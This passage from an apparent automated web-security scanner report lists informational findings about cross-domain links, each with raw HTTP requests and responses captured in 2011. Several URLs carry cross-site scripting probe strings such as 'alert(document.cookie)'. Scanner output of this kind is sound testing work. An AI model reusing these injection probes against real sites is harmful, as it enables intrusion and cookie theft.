</script><script src="http://ib.adnxs.com/ab?enc=FP93RIUqDUAU_3dEhSoNQAAAAEAzMwNAFP93RIUqDUAV_3dEhSoNQO5sBA7j-CcBBWHfHSmrEEL9IEtNAAAAAJUwAAC1AAAANQEAAAIAAACGaAIA0WMAAAEAAABVU0QAVVNEANgCWgAuDE0ATAYBAgUCAAQAAAAAiRtCvwAAAAA.&tt_code=vert-733&udj=uf%28%27a%27%2C+537%2C+1296769277%29%3Buf%28%27c%27%2C+5740%2C+1296769277%29%3Buf%28%27r%27%2C+157830%2C+1296769277%29%3Bppv%28783%2C+%2783308772206079214%27%2C+1296769277%2C+1298065277%2C+5740%2C+25553%29%3B&cnd=!CxUlOwjsLBCG0QkYACDRxwEoTTE_15BnhSoNQEITCAAQABgAIAEo_v__________AUgAUABYrhhgAGi1Ag..&referrer=http://www.tucows.com/previewf2a0f%2522-alert(document.cookie)-%2522d3b3f7c7cb3/194850/x22&pp=TUsg_QAIpdsK5X3QBzhawLMH2W94lylWDqmxiA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB6Tt0_SBLTdvLItD7lQfAteE57_rvmgKnoIehGuPbjo8MABABGAEgADgBUIDH4cQEYMm-somQpNARggEXY2EtcHViLTIwNDcxMDc1NjM5MzE1OTayAQ53d3cudHVjb3dzLmNvbboBCTcyOHg5MF9hc8gBCdoBVmh0dHA6Ly93d3cudHVjb3dzLmNvbS9wcmV2aWV3ZjJhMGYlMjItYWxlcnQoZG9jdW1lbnQuY29va2llKS0lMjJkM2IzZjdjN2NiMy8xOTQ4NTAveDIymAK4F8ACBMgCq4KlDqgDAegD3QXoA6YD9QMCAABE%26num%3D1%26sig%3DAGiWqtxHRI2wjJsysZ9TXU_4G9hbwhS_Wg%26client%3Dca-pub-2047107563931596%26adurl%3D"></script>
...[SNIP]...

18.63. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-2047107563931596&output=html&h=90&slotname=8213712147&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.tucows.com%2Fpreviewf2a0f%2522-alert(document.cookie)-%2522d3b3f7c7cb3%2F194850%2Fx22&dt=1296766283429&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296766283459&frm=1&adk=539573683&ga_vid=579460989.1296766283&ga_sid=1296766283&ga_hid=838670802&ga_fc=0&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3718268994&fu=0&ifi=1&dtd=34 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 20:50:41 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4098

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.tucows.com/previewf2a0f%252522-alert(document.cookie)-%252522d3b3f7c7cb3/194850/x22%26hl%3Den%26client%3Dca-pub-2047107563931596%26adU%3DEventsManager.GFI.Com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNF5rXLUpxJn6KncMrIocGbs9Vh5FA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.64. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=2791779905&w=728&lmt=1296787016&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787016769&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529%2C2067036752&correlator=1296787013038&frm=0&adk=1244530545&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=3&dtd=15&xpc=EKOrMi2Mzx&p=http%3A//www.bizfind.us HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: id=223710c1f90000c9||t=1296786962|et=730|cs=mp7icxmr; expires=Sun, 03-Feb-2013 02:36:02 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:36:02 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Fri, 04 Feb 2011 02:36:02 GMT
Content-Length: 4851

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<span style="display:inline-block;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://pagead2.googlesyndication.com/pagead/images/i.png');height:12px;width:12px"><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 style=filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0) height=12px width=12px/></span></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%252522ns%253D%252522alert(0x0006C1)%26hl%3Den%26client%3Dca-pub-3033999741136561%26adU%3Dwww.Groupon.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNHI3ohFFTCcw_3wIH9tZzSDUatr3A" target=_blank><span style="display:inline-block;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png');height:16px;width:78px"><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png style=filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0) width=78px/></span>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

18.65. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=60&slotname=2067036752&w=468&lmt=1296787055&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787053975&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529&correlator=1296787049605&frm=0&adk=2139689042&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=29221815&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&fu=0&ifi=2&dtd=1055&xpc=anobcNAtE6&p=http%3A//www.bizfind.us HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=223710c1f90000c9||t=1296786962|et=730|cs=mp7icxmr

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:36:41 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 10824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#993400;cursor:hand;}body,table,div,ul,li{font-size
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%252522ns%253D%252522alert(0x0006C1)%26hl%3Den%26client%3Dca-pub-3033999741136561%26adU%3Dwww.drivewayalert.com%26adT%3DThe%2BReal%2BDriveway%2BAlert%25C2%25AE%26adU%3Dwww.chicagoduelingpianos.com%26adT%3D%25231%2BDueling%2BPianos%26gl%3DUS&amp;usg=AFQjCNH4GbcjyS1lVNWPin34lMhFV52yGw" target=_blank><span style="display:inline-block;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png');height:16px;width:78px"><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" style=filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0) width=78></span>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.66. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1452210452390883&output=html&h=280&slotname=6311168488&w=336&lmt=1296808579&flash=10.1.103&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&dt=1296786979313&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296786979521&frm=0&adk=2945653666&ga_vid=1497204128.1296786980&ga_sid=1296786980&ga_hid=1309119251&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F36&fu=0&ifi=1&dtd=787&xpc=YJtTdoPlwc&p=http%3A//www.ip-adress.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.ip-adress.com/whois/smartdevil.com44a08'%3b28a34fbd60c/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:35:26 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 9709

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.ip-adress.com/whois/smartdevil.com44a08%2527%25253B28a34fbd60c/x22%26hl%3Den%26client%3Dca-pub-1452210452390883%26adU%3Dwww.Moxiesoft.com%26adT%3DMoxie%2BLive%2BChat%2BSolutions%26gl%3DUS&amp;usg=AFQjCNHm297NJHjYzKfcGn1WFvjQlOCnLg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

18.67. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=2791779905&w=728&lmt=1296808620&flash=10.1.103&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787020952&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529%2C2067036752&correlator=1296787019866&frm=0&adk=1244530545&ga_vid=371918977.1296786866&ga_sid=1296786866&ga_hid=969342198&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&fu=0&ifi=3&dtd=11&xpc=WZvbsEpZ0D&p=http%3A//www.bizfind.us HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:36:07 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 1692

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- {1663683288} --><!-- {http://www.ljmsite.com/google/gadgetads/kayakhotel/728x90.xml} -->
<iframe width="728" height="90" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" style="border:0px;padding:0px;margin:0px;overflow:hidden;" src="http://ads.gmodules.com/gadgets/ifr?synd=ads&amp;url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml&amp;lang=en&amp;country=US&amp;up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26num%3D1%26ggladgrp%3D9764709784055921816%26gglcreat%3D9143352621951917205%26sig%3DAGiWqtwyJ0z2eP12NfR0KoaagOUkxWNa_A%26client%3Dca-pub-3033999741136561%26adurl%3D&amp;up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26sigh%3DG7T3ZBT9Zc4%26label%3D_AITNAME_%26value%3D_AITVALUE_&amp;up_ads_clicktarget_new_=0&amp;up_rawquery=chicago%20hotels&amp;up_city=Crystal&amp;up_region=US-MI&amp;up_lat=43.26&amp;up_long=-84.91"></iframe>
...[SNIP]...

18.68. http://groups.google.com/grphp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /grphp?hl=en&tab=wg HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a8c437639c0cef65:TM=1296765185:LM=1296765185:S=qlHTfVZBdSJ73PiS; expires=Sat, 02-Feb-2013 20:33:05 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 20:33:05 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</b> <a href="http://www.youtube.com/results?hl=en&tab=g1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"> </script>
...[SNIP]...

18.69. http://ir.supermedia.com/common/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ir.supermedia.com
Path:   /common/mobile/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /common/mobile/?CompanyID=VERIZONINFO HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:37:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A37%3A15%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:15 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:15 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:37:15 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8
...[SNIP]...
<link rel="stylesheet" type="text/css" href="mobile.css" />    
   <link rel="stylesheet" type="text/css" href="http://ir.idearc.com/css/sh_mobile.css" />    

<script type="text/javascript">
...[SNIP]...
<div class="sh_logo">
<img src="http://investor.shareholder.com/common/alerts/VERIZONINFO/default/logo.gif" alt="SuperMedia Inc. Logo" border="0" />
</div>
...[SNIP]...
<div>
<img id="pricechart" border="0" src="https://charts.edgar-online.com/ext/charts.dll?2-4-e-0-0-53-03NA000000SPMD&fs-100-SF:1|2|5|3-BG=ffffff-BG1=ffffff-BG2=ffffff-FF:A18=ffffff|A33=ffffff-ht=125-wd=240-FT:0=2-HO:SW|SE|NW|NE-AP:9=2|10=2-FB:1=B6C1D0-FL:2=990033-FF:2=990033-FL:3=009900-FF:3=009900-FL:1=768AA6-FF:1=768AA6-FL:18=768AA6-FF:18=768AA6-FL:5=009900-FF:5=009900-HC:2-AT:9=0-FI:-FTC:A17=FFFFFF" alt="Stock price graph" title="" />
</div>
...[SNIP]...
<div class="ind">This is an optimized Investor Page for viewing on your mobile devices. To view our entire Investor Relations site, <a href="http://ir.idearc.com/?nomobile=1">click here</a>
...[SNIP]...

18.70. http://ir.supermedia.com/contactus.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ir.supermedia.com
Path:   /contactus.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /contactus.cfm?sh_email=yes& HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763633|check#true#1296761833;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:49:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A49%3A08%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:49:09 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:49:09 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:49:09 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
<title>SuperMedia - Contact Us</title>
<lin
...[SNIP]...
<td><img src="http://apps.shareholder.com/captcha/captcha.aspx?verifyid=332663682&CompanyID=VERIZONINFO&t=.jpg" /></td>
...[SNIP]...

18.71. http://ir.supermedia.com/contactus.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ir.supermedia.com
Path:   /contactus.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /contactus.cfm?sh_print=yes& HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763633|check#true#1296761833;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:49:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A49%3A07%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:49:07 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:49:07 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:49:07 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<br>
Web: <a href="http://www.bnymellon.com/shareowner/isd" target="_blank">www.bnymellon.com/shareowner/isd</a>
...[SNIP]...
<td><img src="http://apps.shareholder.com/captcha/captcha.aspx?verifyid=332663677&CompanyID=VERIZONINFO&t=.jpg" />
<br />
...[SNIP]...

18.72. http://ir.supermedia.com/eventdetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ir.supermedia.com
Path:   /eventdetail.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /eventdetail.cfm?EventID=92127 HTTP/1.1
